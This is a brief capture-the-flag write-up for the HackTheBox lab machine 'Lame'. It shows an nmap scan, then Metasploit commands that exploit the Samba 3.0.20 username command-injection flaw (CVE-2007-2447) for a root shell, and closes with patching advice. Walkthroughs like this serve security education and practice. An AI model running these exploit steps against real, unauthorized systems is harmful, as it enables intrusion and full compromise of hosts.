HackTheBox — Lame

HackTheBox — Lame

February 01, 2025 1 min read HackTheBox Facile
#linux #samba #cve #metasploit

Overview

Lame is a beginner HackTheBox machine exploiting an outdated Samba service (CVE-2007-2447).

Reconnaissance

nmap -sC -sV -oN nmap/lame 10.10.10.3

Open ports:

  • 21 — FTP (vsftpd 2.3.4)
  • 22 — SSH
  • 139/445 — Samba 3.0.20

Exploitation

Samba 3.0.20 is vulnerable to a command injection via the username field.

use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
run

Flags

Direct root shell obtained — both user and root flags accessible immediately.

Key Takeaways

  • Keep services updated — legacy Samba versions are well-documented attack vectors
  • Always check for known CVEs on identified service versions